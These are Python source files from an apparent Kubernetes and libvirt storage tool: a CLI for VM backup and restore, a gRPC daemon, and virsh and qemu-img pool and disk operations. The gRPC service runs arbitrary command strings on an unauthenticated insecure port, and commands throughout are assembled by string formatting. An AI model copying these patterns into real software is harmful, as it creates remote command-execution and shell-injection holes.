parser_modify_vm = subparsers.add_parser("modifyVM", help="modifyVM help")
parser_modify_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to migrate")
# parser_migrate_vm_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
# help="target storage pool to use")
# set default func
parser_modify_vm.set_defaults(func=modifyVMParser)
# -------------------- add exportVM cmd ----------------------------------
parser_export_vm = subparsers.add_parser("exportVM", help="exportVM help")
parser_export_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_export_vm.add_argument("--path", required=True, metavar="[PATH]", type=str,
help="vm disk file to export")
# set default func
parser_export_vm.set_defaults(func=exportVMParser)
# -------------------- add backupVM cmd ----------------------------------
parser_backup_vm = subparsers.add_parser("backupVM", help="backupVM help")
parser_backup_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_backup_vm.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_backup_vm.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_backup_vm.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="all vm disk")
parser_backup_vm.add_argument("--full", required=False, metavar="[FULL]", type=bool, nargs='?', const=True,
help="full backup")
parser_backup_vm.add_argument("--remote", required=False, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_backup_vm.add_argument("--port", required=False, metavar="[PORT]", type=str,
help="remote server port.")
parser_backup_vm.add_argument("--username", required=False, metavar="[REMOTE]", type=str,
help="remote server username.")
parser_backup_vm.add_argument("--password", required=False, metavar="[REMOTE]", type=str,
help="remote server password.")
# set default func
parser_backup_vm.set_defaults(func=backupVMParser)
# -------------------- add restoreVM cmd ----------------------------------
parser_restore_vm = subparsers.add_parser("restoreVM", help="restoreVM help")
parser_restore_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_restore_vm.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_restore_vm.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="all vm disk")
parser_restore_vm.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_restore_vm.add_argument("--newname", required=False, metavar="[NEWNAME]", type=str,
help="name when create a new domain")
parser_restore_vm.add_argument("--target", required=False, metavar="[TARGET]", type=str,
help="use target pool to create a new domain")
# set default func
parser_restore_vm.set_defaults(func=restoreVMParser)
# -------------------- add backupDisk cmd ----------------------------------
parser_backup_disk = subparsers.add_parser("backupDisk", help="backupDisk help")
parser_backup_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_backup_disk.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_backup_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_backup_disk.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_backup_disk.add_argument("--full", required=False, metavar="[FULL]", type=bool, nargs='?', const=True,
help="full backup")
parser_backup_disk.add_argument("--remote", required=False, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_backup_disk.add_argument("--port", required=False, metavar="[PORT]", type=str,
help="remote server port.")
parser_backup_disk.add_argument("--username", required=False, metavar="[REMOTE]", type=str,
help="remote server username.")
parser_backup_disk.add_argument("--password", required=False, metavar="[REMOTE]", type=str,
help="remote server password.")
# set default func
parser_backup_disk.set_defaults(func=backupDiskParser)
# -------------------- add restoreDisk cmd ----------------------------------
parser_restore_disk = subparsers.add_parser("restoreDisk", help="restoreDisk help")
parser_restore_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_restore_disk.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_restore_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_restore_disk.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_restore_disk.add_argument("--newname", required=False, metavar="[NEWNAME]", type=str,
help="name when create a new domain")
parser_restore_disk.add_argument("--target", required=False, metavar="[TARGET]", type=str,
help="use target pool to create a new domain")
parser_restore_disk.add_argument("--targetDomain", required=False, metavar="[TARGETDOMAIN]", type=str,
help="target domain to attach disk")
# set default func
parser_restore_disk.set_defaults(func=restoreDiskParser)
# -------------------- add showDiskPool cmd ----------------------------------
parser_show_disk_pool = subparsers.add_parser("showDiskPool", help="showDiskPool help")
parser_show_disk_pool.add_argument("--path", required=True, metavar="[PATH]", type=str,
help="vm disk path")
# set default func
parser_show_disk_pool.set_defaults(func=showDiskPoolParser)
# -------------------- add deleteVMBackup cmd ----------------------------------
parser_delete_vm_backup = subparsers.add_parser("deleteVMBackup", help="restoreVM help")
parser_delete_vm_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_delete_vm_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_delete_vm_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
# set default func
parser_delete_vm_backup.set_defaults(func=deleteVMBackupParser)
# -------------------- add deleteVMDiskBackup cmd ----------------------------------
parser_delete_vm_disk_backup = subparsers.add_parser("deleteVMDiskBackup", help="restoreVM help")
parser_delete_vm_disk_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_delete_vm_disk_backup.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_delete_vm_disk_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_delete_vm_disk_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
# set default func
parser_delete_vm_disk_backup.set_defaults(func=deleteVMDiskBackupParser)
# -------------------- add deleteRemoteBackup cmd ----------------------------------
parser_delete_remote_backup = subparsers.add_parser("deleteRemoteBackup", help="restoreVM help")
parser_delete_remote_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_delete_remote_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_delete_remote_backup.add_argument("--pool", required=False, metavar="[POOL]", type=str,
help="vm pool to backup")
parser_delete_remote_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_delete_remote_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_delete_remote_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_delete_remote_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_delete_remote_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_delete_remote_backup.set_defaults(func=deleteRemoteBackupParser)
# -------------------- add pullRemoteBackup cmd ----------------------------------
parser_pull_remote_backup = subparsers.add_parser("pullRemoteBackup", help="pullRemoteBackup help")
parser_pull_remote_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_pull_remote_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_pull_remote_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_pull_remote_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_pull_remote_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_pull_remote_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_pull_remote_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_pull_remote_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_pull_remote_backup.set_defaults(func=pullRemoteBackupParser)
# -------------------- add pushBackup cmd ----------------------------------
parser_push_backup = subparsers.add_parser("pushBackup", help="pushBackup help")
parser_push_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_push_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_push_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_push_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_push_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_push_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_push_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_push_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_push_backup.set_defaults(func=pushBackupParser)
# -------------------- add createCloudInitUserDataImage cmd ----------------------------------
parser_create_cloud_init = subparsers.add_parser("createCloudInitUserDataImage",
help="createCloudInitUserDataImage help")
parser_create_cloud_init.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_create_cloud_init.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vol")
parser_create_cloud_init.add_argument("--userData", required=False, metavar="[USERDATA]", type=str,
help="userData")
# set default func
parser_create_cloud_init.set_defaults(func=createCloudInitUserDataImageParser)
# -------------------- add createCloudInitUserDataImage cmd ----------------------------------
parser_delete_cloud_init = subparsers.add_parser("deleteCloudInitUserDataImage",
help="deleteCloudInitUserDataImage help")
parser_delete_cloud_init.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_delete_cloud_init.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vol")
# set default func
parser_delete_cloud_init.set_defaults(func=deleteCloudInitUserDataImageParser)
# -------------------- add createCloudInitUserDataImage cmd ----------------------------------
parser_update_os = subparsers.add_parser("updateOS", help="deleteCloudInitUserDataImage help")
parser_update_os.add_argument("--domain", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_update_os.add_argument("--source", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_update_os.add_argument("--target", required=True, metavar="[VOL]", type=str,
help="vol")
# set default func
parser_update_os.set_defaults(func=updateOSParser)
# -------------------- add cleanBackup cmd ----------------------------------
parser_clean_backup = subparsers.add_parser("cleanBackup", help="cleanBackup help")
parser_clean_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_clean_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_clean_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_clean_backup.add_argument("--version", required=False, metavar="[VERSION]", type=str,
help="backup version id")
parser_clean_backup.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="full clean")
# set default func
parser_clean_backup.set_defaults(func=cleanBackupParser)
# -------------------- add cleanBackup cmd ----------------------------------
parser_clean_remote_backup = subparsers.add_parser("cleanRemoteBackup", help="cleanRemoteBackup help")
parser_clean_remote_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_clean_remote_backup.add_argument("--pool", required=False, metavar="[POOL]", type=str,
help="vm pool to backup")
parser_clean_remote_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_clean_remote_backup.add_argument("--version", required=False, metavar="[VERSION]", type=str,
help="backup version id")
parser_clean_remote_backup.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="full clean")
parser_clean_remote_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_clean_remote_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_clean_remote_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_clean_remote_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_clean_remote_backup.set_defaults(func=cleanRemoteBackupParser)
# -------------------- add scanBackup cmd ----------------------------------
parser_scan_backup = subparsers.add_parser("scanBackup", help="scanBackup help")
parser_scan_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_scan_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_scan_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
# set default func
parser_scan_backup.set_defaults(func=scanBackupParser)
# -------------------- add deleteRemoteBackupServer cmd ----------------------------------
parser_delete_remote_backup_server = subparsers.add_parser("deleteRemoteBackupServer",
help="deleteRemoteBackupServer help")
parser_delete_remote_backup_server.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_delete_remote_backup_server.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_delete_remote_backup_server.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_delete_remote_backup_server.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
parser_delete_remote_backup_server.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
# set default func
parser_delete_remote_backup_server.set_defaults(func=deleteRemoteBackupServerParser)
# https://stackoverflow.com/questions/48648036/python-argparse-args-has-no-attribute-func
try:
os.putenv('LANG', 'en_US.UTF-8')
args = parser.parse_args()
args.func(args)
except TypeError:
# print"argument number not enough"
logger.debug(traceback.format_exc())
```
#### File: 742362144/kubeext-SDS-python3/kubesds-rpc-service.py
```python
import os
import socket
import subprocess
import sys
import threading
import time
import traceback
from threading import Thread
import grpc
from json import dumps
from concurrent import futures
from netutils import get_host_ip, get_docker0_IP
from utils.exception import ExecuteException
from utils.k8s import get_hostname_in_lower_case
sys.path.append('%s/' % os.path.dirname(os.path.realpath(__file__)))
from utils import logger
from utils.utils import CDaemon, singleton, runCmdWithResult, runCmdAndGetOutput, runCmd, runCmdAndTransferXmlToJson, \
runCmdAndSplitKvToJson, get_pools_by_node, get_pool_info_from_k8s, pool_active, auto_mount
import cmdcall_pb2, cmdcall_pb2_grpc # 刚刚生产的两个文件
LOG = "/var/log/kubesds-rpc3.log"
logger = logger.set_logger(os.path.basename(__file__), LOG)
DEFAULT_PORT = '19999'
class Operation(object):
def __init__(self, cmd, params, with_result=False, xml_to_json=False, kv_to_json=False, output=False):
if cmd is None or cmd == "":
raise Exception("plz give me right cmd.")
if not isinstance(params, dict):
raise Exception("plz give me right parameters.")
self.params = params
self.cmd = cmd
self.params = params
self.with_result = with_result
self.xml_to_json = xml_to_json
self.kv_to_json = kv_to_json
self.output = output
def get_cmd(self):
cmd = self.cmd
for key in list(self.params.keys()):
cmd = "%s --%s %s " % (cmd, key, self.params[key])
return cmd
def execute(self):
cmd = self.get_cmd()
logger.debug(cmd)
if self.with_result:
return runCmdWithResult(cmd)
elif self.xml_to_json:
return runCmdAndTransferXmlToJson(cmd)
elif self.kv_to_json:
return runCmdAndSplitKvToJson(cmd)
elif self.output:
return runCmdAndGetOutput(cmd)
else:
return runCmd(cmd)
class CmdCallServicer(cmdcall_pb2_grpc.CmdCallServicer):
def Call(self, request, ctx):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {})
op.execute()
logger.debug(request)
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 0, 'msg': 'rpc call kubesds-adm cmd %s successful.' % cmd}, 'data': {}}))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallWithResult(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, with_result=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
if result['result']['code'] == 0:
return cmdcall_pb2.CallResponse(json=dumps(result))
else:
result['result']['msg'] = 'rpc call kubesds-adm cmd failure %s' % result['result']['msg']
return cmdcall_pb2.CallResponse(json=dumps(result))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallAndTransferXmlToJson(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, xml_to_json=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
return cmdcall_pb2.CallResponse(json=dumps(result))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallAndSplitKVToJson(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, kv_to_json=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
return cmdcall_pb2.CallResponse(json=dumps(result))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallAndGetOutput(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, output=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 0, 'msg': result}, 'data': {}}))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def run_server():
# cp k8s config file
if os.path.exists('/root/.kube/config') and not os.path.exists('/etc/kubernetes/admin.conf'):
try:
runCmd('cp -f /root/.kube/config /etc/kubernetes/admin.conf')
except:
pass
# 多线程服务器
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
# 实例化 计算len的类
servicer = CmdCallServicer()
# 注册本地服务,方法CmdCallServicer只有这个是变的
cmdcall_pb2_grpc.add_CmdCallServicer_to_server(servicer, server)
# 监听端口
logger.debug("%s:%s" % (get_docker0_IP(), DEFAULT_PORT))
server.add_insecure_port("%s:%s" % (get_docker0_IP(), DEFAULT_PORT))
# 开始接收请求进行服务
server.start()
# auto mount cstor pool
node_name = get_hostname_in_lower_case()
pools = get_pools_by_node(node_name)
for pool in pools:
try:
# // auto_mount
auto_mount(pool['pool'])
except ExecuteException as e:
logger.debug('can not auto mount pool %s' % pool['poolname'])
return server
# 使用 ctrl+c 可以退出服务
# try:
# print("rpc server running...")
# time.sleep(1000)
# except KeyboardInterrupt:
# print("rpc server stopping...")
# server.stop(0)
def keep_alive():
server = run_server()
server.wait_for_termination()
# while True:
# time.sleep(5)
# while True:
# output = None
# try:
# output = runCmdAndGetOutput('netstat -anp|grep %s:%s' % (get_docker0_IP(), DEFAULT_PORT))
# except ExecuteException:
# logger.debug(traceback.format_exc())
# if output is not None and output.find('%s:%s' % (get_docker0_IP(), DEFAULT_PORT)) >= 0:
# # logger.debug("port 19999 is alive")
# pass
# else:
# # try stop server
# try:
# server.stop(0)
# except Exception:
# logger.debug(traceback.format_exc())
# # restart server
# server = run_server()
# logger.debug("restart port %s..." % DEFAULT_PORT)
# time.sleep(1)
def stop():
output = None
try:
output = runCmdAndGetOutput('ps -ef|grep kubesds-rpc-service')
except ExecuteException:
logger.debug(traceback.format_exc())
if output:
lines = output.splitlines()
if len(lines) <= 1:
return
else:
pid = lines[0].split()[1]
runCmd('kill -9 %s' % pid)
def daemonize():
help_msg = 'Usage: python %s <start|stop|restart|status>' % sys.argv[0]
if len(sys.argv) != 2:
print(help_msg)
sys.exit(1)
pid_fn = '/var/run/kubesds-rpc.pid'
log_fn = '/var/log/kubesds-rpc.log'
err_fn = '/var/log/kubesds-rpc.log'
if sys.argv[1] == 'start':
keep_alive()
elif sys.argv[1] == 'stop':
stop()
elif sys.argv[1] == 'restart':
stop()
keep_alive()
else:
print('invalid argument!')
print(help_msg)
if __name__ == '__main__':
daemonize()
```
#### File: 742362144/kubeext-SDS-python3/operation.py
```python
from netutils import get_host_IP
from utils.ftp import *
from utils.k8s import get_node_name, get_hostname_in_lower_case
from utils.utils import *
from utils import logger
LOG = "/var/log/kubesds3.log"
logger = logger.set_logger(os.path.basename(__file__), LOG)
class Operation(object):
def __init__(self, cmd, params, with_result=False, xml_to_json=False, kv_to_json=False, remote=False, ip=None):
if cmd is None or cmd == "":
raise Exception("plz give me right cmd.")
if not isinstance(params, dict):
raise Exception("plz give me right parameters.")
self.params = params
self.cmd = cmd
self.params = params
self.with_result = with_result
self.xml_to_json = xml_to_json
self.kv_to_json = kv_to_json
self.remote = remote
self.ip = ip
def get_cmd(self):
cmd = self.cmd
for key in list(self.params.keys()):
cmd = "%s --%s %s " % (cmd, key, self.params[key])
return cmd
def execute(self):
cmd = self.get_cmd()
logger.debug(cmd)
if self.remote:
if self.with_result:
logger.debug(self.remote)
logger.debug(self.ip)
return remoteRunCmdWithResult(self.ip, cmd)
else:
logger.debug(self.remote)
logger.debug(self.ip)
return remoteRunCmd(self.ip, cmd)
else:
if self.with_result:
return runCmdWithResult(cmd)
elif self.xml_to_json:
return runCmdAndTransferXmlToJson(cmd)
elif self.kv_to_json:
return runCmdAndSplitKvToJson(cmd)
else:
return runCmd(cmd)
# class Executor(object):
# def __init__(self, ops):
# self.ops = ops
#
# def get_cmd(self):
# cmd = ""
# for k, v in self.params:
# cmd = self.cmd + " " + k + " " + v + " "
# return cmd
#
# def execute(self):
# if self.cmd is None:
# raise Exception("not found cmd to execute")
# cmd = self.get_cmd()
# if self.with_result:
# return runCmdWithResult(cmd)
# else:
# return runCmdAndCheckReturnCode(cmd)
def createPool(params):
# {"result":{"code":0, "msg":"success"}, "data":{"status": "active", "mountpath": "/Disk240", "proto": "localfs", "url": "/dev/sdb1", "poolname": "pool1", "free": 223363817472, "disktype": "file", "maintain": "normal", "used": 768970752, "total": 236152303616}, "obj":"pooladd"}
if params.opt:
kv = {"type": params.type, "poolname": params.uuid, "url": params.url, "opt": params.opt, "uuid": params.pool}
else:
kv = {"type": params.type, "poolname": params.uuid, "url": params.url, "uuid": params.pool}
# // mount
MOUNT_PATH = '%s/%s' % (DEFARULT_MOUNT_DIR, params.uuid)
mount_storage(params.type, params.opt, params.url, MOUNT_PATH)
POOL_PATH = '%s/%s/%s' % (DEFARULT_MOUNT_DIR, params.uuid, params.uuid)
if not os.path.exists(POOL_PATH):
os.makedirs(POOL_PATH)
# step1 define pool
op1 = Operation("virsh pool-define-as", {"name": params.uuid, "type": "dir", "target": POOL_PATH})
op1.execute()
try:
# step2 autostart pool
if params.autostart:
op2 = Operation("virsh pool-autostart", {"pool": params.uuid})
op2.execute()
op3 = Operation("virsh pool-start", {"pool": params.uuid})
op3.execute()
except ExecuteException as e:
op_cancel = Operation("virsh pool-undefine", {"--pool": params.uuid})
op_cancel.execute()
raise e
with open('%s/content' % POOL_PATH, 'w') as f:
f.write(params.content)
# if params.opt:
# url = '%s;%s' % (params.url, params.opt)
# else:
# url = '%s;%s' % (params.url, params.opt)
result = get_pool_info_to_k8s(params.type, params.pool, params.url, params.uuid, params.content)
pool_helper = K8sHelper('VirtualMachinePool')
pool_helper.create(params.pool, 'pool', result)
success_print("create pool %s successful." % params.pool, result)
def deletePool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
if is_pool_started(poolname):
raise ExecuteException('RunCmdError', 'pool %s still active, plz stop it first.' % poolname)
if is_pool_defined(poolname):
op2 = Operation("virsh pool-undefine", {"pool": poolname})
op2.execute()
umount_storage(params.pool)
helper = K8sHelper("VirtualMachinePool")
helper.delete(params.pool)
success_print("delete pool %s successful." % params.pool, {})
def startPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
if pool_info['pooltype'] == 'vdiskfs':
pool_active(pool_info['pool'])
if not is_pool_started(pool_info['poolname']):
op1 = Operation("virsh pool-start", {"pool": poolname})
op1.execute()
pool_info["state"] = "active"
success_print("start pool %s successful." % params.pool, pool_info)
def autoStartPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
if params.disable:
op = Operation("virsh pool-autostart --disable", {"pool": poolname})
op.execute()
pool_info["autostart"] = 'no'
else:
op = Operation("virsh pool-autostart", {"pool": poolname})
op.execute()
pool_info["autostart"] = 'yes'
success_print("autoStart pool %s successful." % params.pool, pool_info)
def stopPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
if is_pool_exists(poolname) and is_pool_started(poolname):
op1 = Operation("virsh pool-destroy", {"pool": poolname})
op1.execute()
pool_info["state"] = "inactive"
success_print("stop pool %s successful." % poolname, pool_info)
def showPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
result = get_pool_info(poolname)
if is_pool_started(poolname):
result['state'] = "active"
else:
result['state'] = "inactive"
result['content'] = pool_info["content"]
result["pooltype"] = pool_info["pooltype"]
result["pool"] = params.pool
result["free"] = result['available']
result["poolname"] = pool_info["poolname"]
result["uuid"] = pool_info['uuid']
# update pool
if operator.eq(pool_info, result) != 0:
k8s = K8sHelper('VirtualMachinePool')
k8s.update(pool_info['pool'], 'pool', result)
success_print("show pool %s successful." % poolname, result)
def get_disk_dir(pool, vol):
pool_info = get_pool_info(pool)
if not os.path.isdir(pool_info['path']):
raise ExecuteException('', 'can not get virsh pool path.')
# create disk dir and create disk in dir.
disk_dir = "%s/%s" % (pool_info['path'], vol)
def qemu_create_disk(pool, poolname, vol, format, capacity):
pool_info = get_pool_info(poolname)
if not os.path.isdir(pool_info['path']):
raise ExecuteException('', 'can not get virsh pool path.')
# create disk dir and create disk in dir.
disk_dir = "%s/%s" % (pool_info['path'], vol)
if os.path.isdir(disk_dir):
raise ExecuteException('', 'error: disk dir has exist.')
os.makedirs(disk_dir)
disk_path = "%s/%s" % (disk_dir, vol)
op = Operation('qemu-img create -f %s %s %s' % (format, disk_path, capacity), {})
op.execute()
write_config(vol, disk_dir, disk_path, pool, poolname)
result = get_disk_info_to_k8s(poolname, vol)
return result
def createDisk(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
result = qemu_create_disk(params.pool, poolname, params.vol, params.format, params.capacity)
uni = result["uni"]
vol_helper = K8sHelper('VirtualMachineDisk')
vol_helper.create(params.vol, 'volume', result)
success_print("create disk %s successful." % params.vol, result)
def updateOS(params):
if not is_vm_exist(params.domain):
raise ExecuteException('', 'not exist domain %s.' % params.domain)
if is_vm_active(params.domain):
raise ExecuteException('', 'domain %s is still running, plz stop it first.' % params.domain)
prepare_disk_by_path(params.source)
prepare_disk_by_path(params.target)
disks = get_disks_spec(params.domain)
os_disk_tag, os_disk_path = get_os_disk(params.domain)
if params.source not in list(disks.keys()) or disks[params.source] != os_disk_tag:
raise ExecuteException('', '%s is not in domain %s disks.' % (params.source, params.domain))
if not os.path.exists(params.source):
raise ExecuteException('', 'source file %s not exist.' % params.source)
if not os.path.exists(params.target):
raise ExecuteException('', 'target file %s not exist.' % params.target)
info = get_disk_prepare_info_by_path(params.source)
vol = info['disk']
pool = info['pool']
vol_info = get_vol_info_from_k8s(vol)
pool_info = get_pool_info_from_k8s(pool)
# disk_file_need_delete = []
snapshots_need_to_delete = []
disk_dir = '%s/%s' % (pool_info['path'], vol)
snapshots_dir = '%s/snapshots' % disk_dir
if os.path.exists(snapshots_dir):
for df in os.listdir(snapshots_dir):
try:
ss_info = get_snapshot_info_from_k8s(df)
snapshots_need_to_delete.append(df)
except:
pass
new_path = '%s/%s/%s' % (pool_info['path'], vol, vol)
op = Operation('cp -f %s %s' % (params.target, new_path), {})
op.execute()
# write_config(vol, '%s/%s' % (pool_info['path'], vol), new_path, pool, pool_info['poolname'])
for df in os.listdir(disk_dir):
try:
if os.path.isdir('%s/%s' % (disk_dir, df)):
op = Operation('rm -rf %s/%s' % (disk_dir, df), {})
op.execute()
else:
if df == 'config.json' or df == vol:
continue
else:
op = Operation('rm -f %s/%s' % (disk_dir, df), {})
op.execute()
except:
pass
change_vol_current(vol, new_path)
change_vm_os_disk_file(params.domain, params.source, new_path)
modifyVMOnNode(params.domain)
ss_helper = K8sHelper("VirtualMachineDiskSnapshot")
for ss in snapshots_need_to_delete:
if ss_helper.exist(ss):
ss_helper.delete(ss)
success_print("updateOS %s successful." % params.domain, {})
def createCloudInitUserDataImage(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
# cfg = '/tmp/%s.cfg' % randomUUID()
# logger.debug(params.userData)
# with open(cfg, 'w') as f:
# data = ''
